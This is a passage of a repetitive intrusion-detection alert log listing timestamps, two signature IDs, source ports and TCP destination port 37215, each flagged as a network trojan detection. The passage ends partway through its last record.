          Timestamp:06/08/24-15:05:33.495949
          SID:2835222
          Source Port:48052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110209
          SID:2829579
          Source Port:39296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806074
          SID:2829579
          Source Port:40782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470682
          SID:2835222
          Source Port:38480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707490
          SID:2829579
          Source Port:35456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796031
          SID:2829579
          Source Port:35664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152681
          SID:2835222
          Source Port:37448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787280
          SID:2829579
          Source Port:58360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.508488
          SID:2835222
          Source Port:57608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911918
          SID:2835222
          Source Port:54640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781096
          SID:2829579
          Source Port:46228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745521
          SID:2829579
          Source Port:41696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668089
          SID:2835222
          Source Port:38996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.166583
          SID:2829579
          Source Port:40366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403267
          SID:2829579
          Source Port:43244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.860846
          SID:2835222
          Source Port:45902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551532
          SID:2835222
          Source Port:60626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.168467
          SID:2829579
          Source Port:43166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233599
          SID:2835222
          Source Port:55042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517869
          SID:2835222
          Source Port:54644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.109371
          SID:2829579
          Source Port:54122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511492
          SID:2835222
          Source Port:38568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731653
          SID:2835222
          Source Port:52806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.109116
          SID:2835222
          Source Port:37950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.134233
          SID:2835222
          Source Port:45676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041403
          SID:2829579
          Source Port:37884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810752
          SID:2835222
          Source Port:58850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.153172
          SID:2835222
          Source Port:55736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796468
          SID:2835222
          Source Port:50532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.154012
          SID:2829579
          Source Port:56726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242630
          SID:2835222
          Source Port:55416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462538
          SID:2835222
          Source Port:36630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668586
          SID:2835222
          Source Port:38842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.149914
          SID:2835222
          Source Port:53430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159100
          SID:2835222
          Source Port:54536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262106
          SID:2835222
          Source Port:35630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135553
          SID:2835222
          Source Port:53966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545772
          SID:2835222
          Source Port:49180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184607
          SID:2829579
          Source Port:54414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127168
          SID:2829579
          Source Port:59254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241279
          SID:2829579
          Source Port:36804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.843009
          SID:2829579
          Source Port:54888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.148655
          SID:2829579
          Source Port:54212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460862
          SID:2829579
          Source Port:35446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353487
          SID:2835222
          Source Port:53756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.511069
          SID:2835222
          Source Port:36190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796781
          SID:2835222
          Source Port:56422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548847
          SID:2835222
          Source Port:47590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542627
          SID:2835222
          Source Port:36988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446371
          SID:2835222
          Source Port:45968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.748075
          SID:2829579
          Source Port:48930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.168333
          SID:2829579
          Source Port:45370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449500
          SID:2829579
          Source Port:50542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.813593
          SID:2829579
          Source Port:39466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896715
          SID:2835222
          Source Port:54148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732665
          SID:2835222
          Source Port:59004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465080
          SID:2829579
          Source Port:55858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515844
          SID:2829579
          Source Port:60586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.303083
          SID:2835222
          Source Port:57856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241347
          SID:2829579
          Source Port:38890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888243
          SID:2829579
          Source Port:51610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177917
          SID:2835222
          Source Port:50732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.886962
          SID:2835222
          Source Port:34722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.893671
          SID:2835222
          Source Port:57184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.807036
          SID:2835222
          Source Port:39274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741705
          SID:2835222
          Source Port:38484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.243429
          SID:2835222
          Source Port:57620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800869
          SID:2829579
          Source Port:47302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.883895
          SID:2835222
          Source Port:49774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.510287
          SID:2829579
          Source Port:53142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132981
          SID:2835222
          Source Port:55684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791958
          SID:2829579
          Source Port:47576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513374
          SID:2835222
          Source Port:54634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738562
          SID:2835222
          Source Port:53396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.517390
          SID:2835222
          Source Port:41892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513551
          SID:2835222
          Source Port:45292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038259
          SID:2835222
          Source Port:58994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461812
          SID:2829579
          Source Port:58396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.408547
          SID:2829579
          Source Port:44888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.445903
          SID:2835222
          Source Port:46530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805168
          SID:2835222
          Source Port:37370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021186
          SID:2829579
          Source Port:49838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673043
          SID:2835222
          Source Port:43718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781196
          SID:2835222
          Source Port:41132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912748
          SID:2835222
          Source Port:56876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.135981
          SID:2835222
          Source Port:38046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729260
          SID:2835222
          Source Port:42762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352930
          SID:2829579
          Source Port:35950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113944
          SID:2829579
          Source Port:55230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016606
          SID:2835222
          Source Port:35354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796095
          SID:2829579
          Source Port:42274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.860762
          SID:2835222
          Source Port:45100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160343
          SID:2829579
          Source Port:49846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.825039
          SID:2835222
          Source Port:42308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468529
          SID:2835222
          Source Port:43912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180062
          SID:2835222
          Source Port:40800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192367
          SID:2829579
          Source Port:53946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465969
          SID:2835222
          Source Port:60274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912082
          SID:2829579
          Source Port:54730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019116
          SID:2829579
          Source Port:44314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354963
          SID:2835222
          Source Port:48918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.813515
          SID:2835222
          Source Port:60152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.445903
          SID:2829579
          Source Port:33606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.747111
          SID:2829579
          Source Port:46492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.834549
          SID:2829579
          Source Port:44378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.105499
          SID:2829579
          Source Port:44118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270663
          SID:2835222
          Source Port:48960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238005
          SID:2835222
          Source Port:44352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744297
          SID:2835222
          Source Port:35664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115741
          SID:2829579
          Source Port:36120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270009
          SID:2829579
          Source Port:60974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512313
          SID:2835222
          Source Port:35886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179785
          SID:2829579
          Source Port:42454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462899
          SID:2829579
          Source Port:52324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043109
          SID:2829579
          Source Port:34400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107541
          SID:2835222
          Source Port:49566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.179153
          SID:2829579
          Source Port:49438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.791920
          SID:2829579
          Source Port:33614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.160552
          SID:2829579
          Source Port:37874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132016
          SID:2829579
          Source Port:55720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109282
          SID:2829579
          Source Port:36068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261003
          SID:2829579
          Source Port:57028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797285
          SID:2829579
          Source Port:59652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.360925
          SID:2829579
          Source Port:51046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901832
          SID:2835222
          Source Port:60282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463849
          SID:2829579
          Source Port:60382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262289
          SID:2835222
          Source Port:45076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136176
          SID:2835222
          Source Port:55380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136624
          SID:2835222
          Source Port:33184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136174
          SID:2829579
          Source Port:36000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511053
          SID:2829579
          Source Port:54564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463771
          SID:2835222
          Source Port:54490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463991
          SID:2829579
          Source Port:42192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894387
          SID:2835222
          Source Port:51798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114040
          SID:2835222
          Source Port:45044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798725
          SID:2829579
          Source Port:49762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554715
          SID:2829579
          Source Port:42940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739698
          SID:2835222
          Source Port:37314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.822498
          SID:2835222
          Source Port:43416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.169439
          SID:2835222
          Source Port:59634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404768
          SID:2835222
          Source Port:54298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.071491
          SID:2835222
          Source Port:47402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.257695
          SID:2835222
          Source Port:36830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.158889
          SID:2829579
          Source Port:50972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402367
          SID:2829579
          Source Port:54588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.354639
          SID:2829579
          Source Port:42342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036290
          SID:2835222
          Source Port:53542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040259
          SID:2835222
          Source Port:51794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016019
          SID:2829579
          Source Port:35376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.043559
          SID:2835222
          Source Port:52166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037311
          SID:2835222
          Source Port:37350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890913
          SID:2829579
          Source Port:54988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463543
          SID:2829579
          Source Port:40082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745753
          SID:2829579
          Source Port:39166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730515
          SID:2835222
          Source Port:60246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462668
          SID:2835222
          Source Port:37834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892179
          SID:2829579
          Source Port:39914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041249
          SID:2829579
          Source Port:37378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858442
          SID:2835222
          Source Port:60464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860368
          SID:2829579
          Source Port:39360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444505
          SID:2829579
          Source Port:45964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599846
          SID:2835222
          Source Port:55964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515936
          SID:2835222
          Source Port:35324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857158
          SID:2835222
          Source Port:56856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512716
          SID:2829579
          Source Port:53366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732475
          SID:2835222
          Source Port:37960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797689
          SID:2835222
          Source Port:48880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273254
          SID:2829579
          Source Port:38528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239302
          SID:2829579
          Source Port:48214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151265
          SID:2835222
          Source Port:52538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600014
          SID:2835222
          Source Port:34886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.511544
          SID:2829579
          Source Port:34868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.295077
          SID:2835222
          Source Port:50882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.150939
          SID:2829579
          Source Port:47328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551077
          SID:2829579
          Source Port:35310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805205
          SID:2829579
          Source Port:48376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.510025
          SID:2829579
          Source Port:34320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044276
          SID:2835222
          Source Port:43808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.799783
          SID:2835222
          Source Port:34414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854318
          SID:2829579
          Source Port:58592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.799380
          SID:2835222
          Source Port:36198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155516
          SID:2835222
          Source Port:45524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275448
          SID:2835222
          Source Port:57164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912453
          SID:2835222
          Source Port:41530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.396321
          SID:2835222
          Source Port:56938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157100
          SID:2835222
          Source Port:56640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108106
          SID:2835222
          Source Port:45366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705909
          SID:2835222
          Source Port:56994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.832374
          SID:2835222
          Source Port:48202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512086
          SID:2835222
          Source Port:58218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511624
          SID:2835222
          Source Port:47704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741902
          SID:2829579
          Source Port:40106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126023
          SID:2829579
          Source Port:37330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554220
          SID:2835222
          Source Port:58486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351428
          SID:2835222
          Source Port:42258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466653
          SID:2829579
          Source Port:43144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.495897
          SID:2835222
          Source Port:44820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.893585
